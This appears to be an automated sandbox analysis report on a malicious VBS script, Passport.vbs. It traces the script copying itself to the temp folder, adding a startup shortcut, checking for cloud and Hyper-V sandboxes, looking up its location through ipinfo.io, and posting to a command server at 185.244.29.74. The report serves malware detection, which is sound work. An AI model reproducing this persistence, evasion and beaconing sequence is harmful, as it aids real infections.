Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();5000IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbem

Persistence and Installation Behavior

Windows Shell Script Host drops VBS files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Passport.vbs

Jump to behavior

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49730

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential context-aware VBS script found (checks for environment specific values)

Source:	Initial file: If objItem.Model = "Google Compute Engine" Then
Source: C:\Windows\System32\wscript.exe	Dropped file: If objItem.Model = "Google Compute Engine" Then			Jump to dropped file

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnq
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCFA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP@

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 34.117.59.81 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 185.244.29.74 456			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
185.244.29.74	unknown	Netherlands		209623	DAVID_CRAIGGG	true

Contacted Domains

Name	IP	Active
ipinfo.io	34.117.59.81	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.244.29.74:456/document	true	0%, Virustotal, Browse	unknown
https://ipinfo.io/org	true	0%, Virustotal, Browse	unknown
https://ipinfo.io/country	true	0%, Virustotal, Browse	unknown

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.7% probability

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 34.117.59.81 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 185.244.29.74 456			Jump to behavior

Potential malicious VBS script found (has network functionality)

Source:	Initial file: xx.setrequestheader "User-Agent",gg
Source: C:\Windows\System32\wscript.exe	Dropped file: xx.setrequestheader "User-Agent",gg			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49730

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49706 -> 185.244.29.74:456

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: Joe Sandbox View	ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: ipinfo.io

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74

Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ipinfo.io

Source: unknown

Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/d1
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/j
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155696546.00000282CCBC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: http://185.244.29.74:456/document
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document&
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document32
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentB
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentG
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentJ
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentT
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentX
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document_
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentage:
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentgE
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentnE
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentq
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentr
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country6%
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryS
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryY:
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country_
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryq
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryz%
